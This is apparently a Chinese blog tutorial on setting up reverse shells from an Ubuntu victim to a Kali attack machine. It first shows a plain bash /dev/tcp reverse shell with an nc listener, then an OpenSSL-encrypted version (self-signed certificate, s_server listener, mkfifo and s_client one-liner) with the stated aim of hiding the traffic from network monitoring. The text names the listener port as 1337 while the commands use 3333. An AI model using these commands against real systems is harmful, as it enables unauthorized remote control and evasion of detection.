kali使用OpenSSL加密反弹shell
kali使用OpenSSL加密反弹shell
通过bash普通反弹shell
kali开启监听
nc -lvp 3333
在受害机上反弹交互式shell
bash -i &>/dev/tcp/192.168.80.131/3333 <&1
成功反弹了ubuntu的shell,打开wireshark监听网卡
可以看到此时的流量都是明文传输,没有进行加密,这是会被IDC捕捉到的。
OpenSSL加密反弹shell
OpenSSL 简介
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份利用 OpenSSL 反弹 shell 之前需要生成自签名证书。
使用 OpenSSL 生成签名证书
在kali上生成证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
生成自签名证书时会提示输入证书信息,如果懒得填写可以一路回车
使用 OpenSSL 反弹加密 shell
假设我们从 ubuntu 主机反弹 shell 到 kali 主机
------------------ ------------------------- | A:192.168.80.135 | --- shell ---> | B:192.168.80.131:3333 | ------------------ -------------------------
首先需用利用上一步生成的自签名证书,在 kali 主机上使用 OpenSSL 监听一个端口,在这里使用 3333 端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 3333
此时 OpenSSL 在 1337 端口上启动了一个 SSL/TLS server
这时在 ubuntu 主机以OpenSSL形式进行反弹 shell 操作,命令为:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.80.131:3333 > /tmp/s; rm /tmp/s
此时已经成功反弹了shell到我们的攻击机上
使用 wireshark 抓包可以看到,ubuntu 和 kali 主机之间在使用 TLS1.2 协议进行加密通信
到此,已经实现流量加密。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)